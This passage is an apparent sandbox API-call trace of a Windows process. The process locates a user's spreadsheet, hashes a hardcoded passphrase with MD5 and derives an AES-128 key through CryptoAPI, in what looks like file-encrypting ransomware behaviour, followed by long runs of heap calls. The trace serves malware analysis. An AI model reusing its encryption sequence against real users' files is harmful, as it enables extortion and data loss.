lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0083.099] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2b95160, ftCreationTime.dwHighDateTime=0x1d5ea67, ftLastAccessTime.dwLowDateTime=0xe909a60, ftLastAccessTime.dwHighDateTime=0x1d5f008, ftLastWriteTime.dwLowDateTime=0xe909a60, ftLastWriteTime.dwHighDateTime=0x1d5f008, nFileSizeHigh=0x0, nFileSizeLow=0x14a89, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="ul2gt2Lt.xlsx", cAlternateFileName="UL2GT2~1.XLS")) returned 0x41ac440 [0083.100] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0083.100] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.100] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0083.100] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.100] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0083.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0083.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0083.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0083.100] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a4a58) returned 1 [0083.101] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0083.101] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.101] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0083.101] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.101] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.101] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.102] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.102] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43c3848, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0083.102] CryptCreateHash (in: hProv=0x41a4a58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0083.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0083.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0083.102] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0083.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0083.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0083.102] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.102] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0083.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3650, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0083.102] CryptHashData (hHash=0x41ac780, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0083.102] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.103] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0083.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3740, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0083.103] CryptDeriveKey (in: hProv=0x41a4a58, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac180) returned 1 [0083.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0083.103] CryptDestroyHash (hHash=0x41ac780) returned 1 [0083.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3890 | out: hHeap=0x1780000) returned 1 [0083.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a40 | out: hHeap=0x1780000) returned 1 [0083.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0083.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38d8 [0083.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b78 [0083.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b78 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38d8 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04b8 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a10 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3908 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38f0 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3938 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0083.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0083.105] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0083.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0083.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0083.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0083.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0083.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0083.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0083.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0083.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c39e0 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3968 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0083.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0083.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0083.108] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0083.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0083.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0083.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0083.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0083.109] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0083.109] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0083.155] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0083.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0083.156] 